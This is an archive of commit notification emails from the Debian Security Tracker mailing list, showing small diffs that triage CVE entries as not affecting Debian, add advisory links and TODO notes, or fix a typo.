https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8e48f103b2190b87d8482b5018141085aa9cdd55

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8e48f103b2190b87d8482b5018141085aa9cdd55
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-07-28 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
f09c6b2d by Henri Salo at 2022-07-28T11:19:18+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1428,6 +1428,7 @@ CVE-2022-36367
RESERVED
 CVE-2022-36364
RESERVED
+   NOT-FOR-US: Apache Calcite
 CVE-2022-36298
RESERVED
 CVE-2022-35729



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f09c6b2d2389f48da039eeb1ac01f27d17a54c88

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f09c6b2d2389f48da039eeb1ac01f27d17a54c88
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-07-09 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6f9496a0 by Henri Salo at 2022-07-09T11:05:51+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -80955,7 +80955,7 @@ CVE-2021-31647
 CVE-2021-31646 (Gestsup before 3.2.10 allows account takeover through the 
password rec ...)
NOT-FOR-US: Gestsup
 CVE-2021-31645 (An issue was discovered in glFTPd 2.11a that allows remote 
attackers t ...)
-   TODO: check
+   NOT-FOR-US: glFTPd
 CVE-2021-31644
RESERVED
 CVE-2021-31643 (An XSS vulnerability exists in several IoT devices from CHIYU 
Technolo ...)
@@ -579384,7 +579384,7 @@ CVE-2005-0485 (Cross-site scripting (XSS) 
vulnerability in comment.php for paNew
 CVE-2005-0484 (Format string vulnerability in gprostats for GProFTPD before 
8.1.9 may ...)
NOT-FOR-US: GProFTPD
 CVE-2005-0483 (Multiple directory traversal vulnerabilities in sitenfo.sh, 
sitezipchk ...)
-   NOT-FOR-US: Glftpd
+   NOT-FOR-US: glFTPd
 CVE-2005-0482 (TrackerCam 5.12 and earlier allows remote attackers to cause a 
denial  ...)
NOT-FOR-US: TrackerCam
 CVE-2005-0481 (TrackerCam 5.12 and earlier allows remote attackers to read log 
files  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6f9496a0ee9f6535e56bed83d4c675ab7174ca3c

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6f9496a0ee9f6535e56bed83d4c675ab7174ca3c
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-07-09 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
935d9b4e by Henri Salo at 2022-07-09T11:01:09+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -405940,9 +405940,9 @@ CVE-2015-1786 (Cross-site request forgery (CSRF) 
vulnerability in Zend/Validator
- zendframework  (the vulnerability was introduced 
specifically in the 2.3 series)
NOTE: http://framework.zend.com/security/advisory/ZF2015-03
 CVE-2015-1785 (In nextgen-galery wordpress plugin before 2.0.77.3 there are 
two vulne ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin nextgen-galery
 CVE-2015-1784 (In nextgen-galery wordpress plugin before 2.0.77.3 there are 
two vulne ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin nextgen-galery
 CVE-2015-1783 (The prefix variable in the get_or_define_ns function in Lasso 
before c ...)
- lasso 2.4.1-1
[wheezy] - lasso  (Vulnerable code introduced later)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/935d9b4e2f0e6de0849966f0be24e710d4091621

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/935d9b4e2f0e6de0849966f0be24e710d4091621
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-25167

2022-06-14 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6d9ac5fd by Henri Salo at 2022-06-14T12:10:09+03:00
CVE-2022-25167

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -22459,8 +22459,10 @@ CVE-2022-25169 (The BPG parser in versions of Apache 
Tika before 1.28.2 and 2.4.
NOTE: https://www.openwall.com/lists/oss-security/2022/05/16/4
 CVE-2022-25168
RESERVED
-CVE-2022-25167
+CVE-2022-25167 [Apache Flume JMSSource does not protect from malicious JNDI 
urls]
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/06/14/1
 CVE-2022-24435 (Cross-site scripting vulnerability in phpUploader v1.2 and 
earlier all ...)
NOT-FOR-US: phpUploader
 CVE-2022-23986 (SQL injection vulnerability in the phpUploader v1.2 and 
earlier allows ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6d9ac5fddca8a4cf72f076d597e186618c59c507

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6d9ac5fddca8a4cf72f076d597e186618c59c507
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-27774, CVE-2022-27775, CVE-2022-27776

2022-04-27 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
9f681b89 by Henri Salo at 2022-04-27T09:55:35+03:00
CVE-2022-27774, CVE-2022-27775, CVE-2022-27776

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -5578,12 +5578,21 @@ CVE-2022-27778
RESERVED
 CVE-2022-2
RESERVED
-CVE-2022-27776
+CVE-2022-27776 [Auth/cookie leak on redirect]
RESERVED
-CVE-2022-27775
+   - curl 
+   NOTE: https://curl.se/docs/CVE-2022-27776.html
+   TODO: check
+CVE-2022-27775 [Bad local IPv6 connection reuse]
RESERVED
-CVE-2022-27774
+   - curl 
+   NOTE: https://curl.se/docs/CVE-2022-27775.html
+   TODO: check
+CVE-2022-27774 [Credential leak on redirect]
RESERVED
+   - curl 
+   NOTE: https://curl.se/docs/CVE-2022-27774.html
+   TODO: check
 CVE-2022-27773
RESERVED
 CVE-2022-27772 (** UNSUPPORTED WHEN ASSIGNED ** spring-boot versions prior to 
version  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/9f681b8935afa0e97aee4ab25603bf053900bb1f

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/9f681b8935afa0e97aee4ab25603bf053900bb1f
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2021-25745, CVE-2021-25746

2022-04-22 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b6f53575 by Henri Salo at 2022-04-22T20:17:05+03:00
CVE-2021-25745, CVE-2021-25746

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -78927,8 +78927,12 @@ CVE-2021-25747
RESERVED
 CVE-2021-25746
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/04/22/6
 CVE-2021-25745
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/04/22/5
 CVE-2021-25744
RESERVED
 CVE-2021-25743 (kubectl does not neutralize escape, meta or control sequences 
containe ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b6f53575096973b46b62822b18e8d076b537f1e2

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b6f53575096973b46b62822b18e8d076b537f1e2
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Remove empty newline

2022-04-15 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
88db86d5 by Henri Salo at 2022-04-15T13:16:58+03:00
Remove empty newline

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -487,7 +487,6 @@ CVE-2022-1328 (Buffer Overflow in uudecoder in Mutt 
affecting all versions start
- mutt 
NOTE: https://gitlab.com/muttmua/mutt/-/issues/404
NOTE: 
https://gitlab.com/muttmua/mutt/-/commit/e5ed080c00e59701ca62ef9b2a6d2612ebf765a5
-
 CVE-2022-1327
RESERVED
 CVE-2022-1326



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/88db86d508e45608a362e9fa884fff39d91e033d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/88db86d508e45608a362e9fa884fff39d91e033d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-04-07 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7cf7ed91 by Henri Salo at 2022-04-07T22:12:05+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3844,8 +3844,10 @@ CVE-2022-27222
RESERVED
 CVE-2022-0993
RESERVED
+   NOT-FOR-US: WordPress plugin
 CVE-2022-0992
RESERVED
+   NOT-FOR-US: WordPress plugin
 CVE-2022-0991 (Insufficient Session Expiration in GitHub repository 
admidio/admidio p ...)
NOT-FOR-US: admidio
 CVE-2022-0990 (Server-Side Request Forgery (SSRF) in GitHub repository 
janeczku/calib ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7cf7ed9135f222d59f38cfb311009b4c7419fd0d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7cf7ed9135f222d59f38cfb311009b4c7419fd0d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-24986: KCron: Insecure temporary file handling

2022-02-25 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b3df1883 by Henri Salo at 2022-02-25T14:11:49+02:00
CVE-2022-24986: KCron: Insecure temporary file handling

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2818,6 +2818,8 @@ CVE-2022-24987
RESERVED
 CVE-2022-24986
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/02/25/3
 CVE-2022-24985 (Forms generated by JQueryForm.com before 2022-02-05 allows a 
remote au ...)
NOT-FOR-US: JQueryForm.com
 CVE-2022-24984 (Forms generated by JQueryForm.com before 2022-02-05 (if 
file-upload ca ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b3df1883f6c572ec19526c84e3b11bc5a4912f8d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b3df1883f6c572ec19526c84e3b11bc5a4912f8d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-24948

2022-02-25 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
0778ac16 by Henri Salo at 2022-02-25T14:02:11+02:00
CVE-2022-24948

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2995,6 +2995,7 @@ CVE-2022-24949
RESERVED
 CVE-2022-24948
RESERVED
+   - jspwiki 
 CVE-2022-24947
RESERVED
- jspwiki 



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/0778ac162f6403f75c7f31ef94b87626e41c72d5

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/0778ac162f6403f75c7f31ef94b87626e41c72d5
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-24947

2022-02-25 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
bd747801 by Henri Salo at 2022-02-25T13:59:39+02:00
CVE-2022-24947

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2997,6 +2997,7 @@ CVE-2022-24948
RESERVED
 CVE-2022-24947
RESERVED
+   - jspwiki 
 CVE-2022-24946
RESERVED
 CVE-2022-24945



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/bd747801e11bd4a0aee32412d5674af6d76a3571

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/bd747801e11bd4a0aee32412d5674af6d76a3571
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] airflow

2022-02-24 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
a81b8b6c by Henri Salo at 2022-02-24T21:05:46+02:00
airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4049,6 +4049,7 @@ CVE-2022-24289 (Hessian serialization is a network 
protocol that supports object
NOT-FOR-US: Apache Cayenne
 CVE-2022-24288
RESERVED
+   - airflow  (bug #819700)
 CVE-2022-24287
RESERVED
 CVE-2022-21799 (Cross-site scripting vulnerability in ELECOM LAN router 
WRC-300FEBK-R  ...)
@@ -14418,6 +14419,7 @@ CVE-2021-45230 (In Apache Airflow prior to 2.2.0. This 
CVE applies to a specific
- airflow  (bug #819700)
 CVE-2021-45229
RESERVED
+   - airflow  (bug #819700)
 CVE-2021-45228
RESERVED
 CVE-2021-45227



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a81b8b6cbb1325beff99dd2ef294e662b0a59f9d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a81b8b6cbb1325beff99dd2ef294e662b0a59f9d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-02-07 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
dbb7190c by Henri Salo at 2022-02-07T10:42:19+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -5075,6 +5075,7 @@ CVE-2022-22932 (Apache Karaf obr:* commands and run goal 
on the karaf-maven-plug
- apache-karaf  (bug #881297)
 CVE-2022-22931
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2022-22930 (A remote code execution (RCE) vulnerability in the Template 
Management ...)
NOT-FOR-US: MCMS
 CVE-2022-22929 (MCMS v5.2.4 was discovered to have an arbitrary file upload 
vulnerabil ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/dbb7190c08ffe44065a6b1fb3a50be28132e584e

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/dbb7190c08ffe44065a6b1fb3a50be28132e584e
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-02-05 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
96cd9e0c by Henri Salo at 2022-02-05T13:03:47+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4335,6 +4335,7 @@ CVE-2021-23150
RESERVED
 CVE-2022-23206
RESERVED
+   NOT-FOR-US: Apache Traffic Control
 CVE-2022-23205
RESERVED
 CVE-2022-23204



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/96cd9e0cfaaebd052779e800decaabbea9cd1e25

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/96cd9e0cfaaebd052779e800decaabbea9cd1e25
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-02-04 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8e6aaef1 by Henri Salo at 2022-02-04T11:04:40+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -37033,8 +37033,10 @@ CVE-2021-36153 (Mismanaged state in 
GRPCWebToHTTP2ServerCodec.swift in gRPC Swif
NOT-FOR-US: gRPC Swift
 CVE-2021-36152
RESERVED
+   NOT-FOR-US: Apache Gobblin
 CVE-2021-36151
RESERVED
+   NOT-FOR-US: Apache Gobblin
 CVE-2021-3636 (It was found in OpenShift, before version 4.8, that the 
generated cert ...)
NOT-FOR-US: OpenShift
 CVE-2021-3635 (A flaw was found in the Linux kernel netfilter implementation 
in versi ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8e6aaef17151f2c5f744089a729528a7be6618e2

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8e6aaef17151f2c5f744089a729528a7be6618e2
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-02-01 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
46c238ac by Henri Salo at 2022-02-01T11:15:27+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -12377,6 +12377,7 @@ CVE-2021-44453 (mySCADA myPRO: Versions 8.20.0 and 
prior has a vulnerable debug
NOT-FOR-US: mySCADA myPRO
 CVE-2021-44451
RESERVED
+   NOT-FOR-US: Apache Superset
 CVE-2021-44450 (A vulnerability has been identified in JT Utilities (All 
versions  ...)
NOT-FOR-US: Siemens
 CVE-2021-9 (A vulnerability has been identified in JT Utilities (All 
versions  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/46c238ac902f84385165ba47a44ae46e24e2cee4

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/46c238ac902f84385165ba47a44ae46e24e2cee4
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Typo fix

2022-01-14 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6fc90f41 by Henri Salo at 2022-01-15T02:47:15+02:00
Typo fix

- - - - -


1 changed file:

- data/dsa-needed.txt


Changes:

=
data/dsa-needed.txt
=
@@ -24,7 +24,7 @@ flatpak (seb)
 librecad
 --
 libreswan/stable (carnil)
-  Maintainer preapred updates
+  Maintainer prepared updates
 --
 linux (carnil)
   Wait until more issues have piled up, though try to regulary rebase for point



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6fc90f415e97a3489c5d0f934d78c0a0107abe79

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6fc90f415e97a3489c5d0f934d78c0a0107abe79
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-01-06 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b2df1b42 by Henri Salo at 2022-01-06T15:57:46+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3335,10 +3335,13 @@ CVE-2022-22054
RESERVED
 CVE-2021-45458
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-45457
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-45456
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-45455
RESERVED
 CVE-2021-45454
@@ -28722,6 +28725,7 @@ CVE-2020-36421 (An issue was discovered in Arm Mbed TLS 
before 2.23.0. Because o
NOTE: https://github.com/ARMmbed/mbedtls/issues/3394
 CVE-2021-36774
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-36773 (uBlock Origin before 1.36.2 and nMatrix before 4.4.9 support 
an arbitr ...)
- ublock-origin 1.37.0+dfsg-1 (bug #991386)
[bullseye] - ublock-origin 1.37.0+dfsg-1~deb11u1
@@ -41664,6 +41668,7 @@ CVE-2021-31524
RESERVED
 CVE-2021-31522
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-3510 (Zephyr JSON decoder incorrectly decodes array of array. Zephyr 
version ...)
NOT-FOR-US: Zephyr, different from src:zephyr
 CVE-2021-3509 (A flaw was found in Red Hat Ceph Storage 4, in the Dashboard 
component ...)
@@ -51378,6 +51383,7 @@ CVE-2019-10102 (JetBrains Ktor framework (created using 
the Kotlin IDE template)
NOT-FOR-US: JetBrains Ktor
 CVE-2021-27738
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-27737 (Apache Traffic Server 9.0.0 is vulnerable to a remote DOS 
attack on th ...)
- trafficserver  (Only affects 9.x)
 CVE-2020-35358 (DomainMOD domainmod-v4.15.0 is affected by an insufficient 
session exp ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b2df1b4218cbed97dd84e9008d3c994ee260d411

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b2df1b4218cbed97dd84e9008d3c994ee260d411
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] 2 commits: NFU

2022-01-04 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
dd79b441 by Henri Salo at 2022-01-04T14:53:37+02:00
NFU

- - - - -
06412638 by Henri Salo at 2022-01-04T14:55:16+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -18914,6 +18914,7 @@ CVE-2021-40526 (Incorrect calculation of buffer size 
vulnerability in Peleton TT
NOT-FOR-US: Peleton
 CVE-2021-40525
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2021-3776 (showdoc is vulnerable to Cross-Site Request Forgery (CSRF) ...)
NOT-FOR-US: showdoc
 CVE-2021-3775 (showdoc is vulnerable to Cross-Site Request Forgery (CSRF) ...)
@@ -19994,8 +19995,10 @@ CVE-2021-40112 (Multiple vulnerabilities in the 
web-based management interface o
NOT-FOR-US: Cisco
 CVE-2021-40111
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2021-40110
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2021-40109 (A SSRF issue was discovered in Concrete CMS through 8.5.5. 
Users can a ...)
NOT-FOR-US: Concrete CMS
 CVE-2021-40108 (An issue was discovered in Concrete CMS through 8.5.5. The 
Calendar is ...)
@@ -23711,6 +23714,7 @@ CVE-2021-38543 (TP-Link UE330 USB splitter devices 
through 2021-08-09, in certai
NOT-FOR-US: TP-Link
 CVE-2021-38542
RESERVED
+   NOT-FOR-US Apache James
 CVE-2021-38541
RESERVED
 CVE-2021-3699
@@ -32758,6 +32762,7 @@ CVE-2021-3604 (Secure 8 (Evalos) does not validate user 
input data correctly, al
NOT-FOR-US: Secure 8 (Evalos)
 CVE-2021-34797
RESERVED
+   NOT-FOR-US: Apache Geode
 CVE-2021-34796
RESERVED
 CVE-2021-34795 (Multiple vulnerabilities in the web-based management interface 
of the  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/compare/b074589480797821bc1933c2bc6d3a77e6664aaf...06412638e77ddd1dc0eb5a8c11dd8ebe8536b140

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/compare/b074589480797821bc1933c2bc6d3a77e6664aaf...06412638e77ddd1dc0eb5a8c11dd8ebe8536b140
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-12-21 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6cb91b0f by Henri Salo at 2021-12-21T10:55:20+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -20,10 +20,13 @@ CVE-2021-4143
RESERVED
 CVE-2017-20010
RESERVED
+   NOT-FOR-US: MODX Revolution
 CVE-2017-20009
RESERVED
+   NOT-FOR-US: MODX Revolution
 CVE-2012-20001
RESERVED
+   NOT-FOR-US: PrestaShop
 CVE-2021-45442
RESERVED
 CVE-2021-45441



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6cb91b0fb8002538d3faf91461a4270074665c71

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6cb91b0fb8002538d3faf91461a4270074665c71
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-12-16 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
550a04b2 by Henri Salo at 2021-12-17T08:46:37+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2943,6 +2943,7 @@ CVE-2021-44146
RESERVED
 CVE-2021-44145
RESERVED
+   NOT-FOR-US: Apache NiFi
 CVE-2021-44144 (Croatia Control Asterix 2.8.1 has a heap-based buffer 
over-read, with  ...)
NOT-FOR-US: Croatia Control Asterix
 CVE-2021-4004



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/550a04b2c5d97de89cebb02973132baecfd5497d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/550a04b2c5d97de89cebb02973132baecfd5497d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-12-06 Thread Henri Salo (@hsalo-guest)



